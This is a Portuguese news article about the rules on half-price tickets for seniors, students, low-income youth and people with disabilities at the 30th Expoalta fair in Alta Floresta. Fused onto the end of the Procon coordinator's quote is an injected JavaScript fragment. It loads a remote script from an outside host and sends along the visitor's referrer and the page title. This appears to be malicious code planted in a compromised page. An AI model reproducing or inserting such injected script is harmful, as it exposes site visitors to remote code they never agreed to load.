Capa / Cidades / Definida venda de meia-entrada para Expoalta

Definida venda de meia-entrada para Expoalta

meia entradaDionéia Martins

Ainda faltam três meses para a 30ª Expoalta, mas os preparativos para que tudo ocorra dentro da legalidade já começa a ser discutido. Na sexta-feira, 05, aconteceu uma reunião entre o Ministério Público, Procon, Vigilância Sanitária e Sindicato Rural de Alta Floresta, a discussão foi sobre a meia-entrada e outras situações que a organização da festa deverá se adequar.
Conforme o Estatuto os idosos com 60 anos completo, desde que comprovado com documento de identificação terá direito a pagar 50% do valor. Os estudantes terão direito a 40% do total de ingressos colocados a venda. Para comprar o ingresso com o desconto o estudante terá que está matriculado em uma entidade de ensino seja ela pública ou particular e comprovar por meio da carteira emitida por uma entidade representativa como UBES, UNE ou DCEs.
O sindicato será obrigado a disponibilizar a venda da meia-entrada em todos os postos de venda. Na compra do passaporte que dá direito a participar do show de prêmios, o beneficio da meia-entrada não terá validade.
Conforme determina a lei, os jovens de baixa renda também terão direito a meia-entrada, desde que comprovado por meio da carteira que o identifique como tal, só tem acesso a este documento as pessoas que estão cadastrados no cadastro único do governo federal.
Os deficientes físicos também terão direito a meia-entrada. “Nesta categoria ficou decidido que os organizadores deverão disponibilizar também banheiros femininos e masculinos adequados. Para ter acesso a estes serviços o mesmo deverá apresentar documento que o classifique com qualquer tipo de deficiência”, disse o coordenador do Procon, Valdecir Nascimento.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top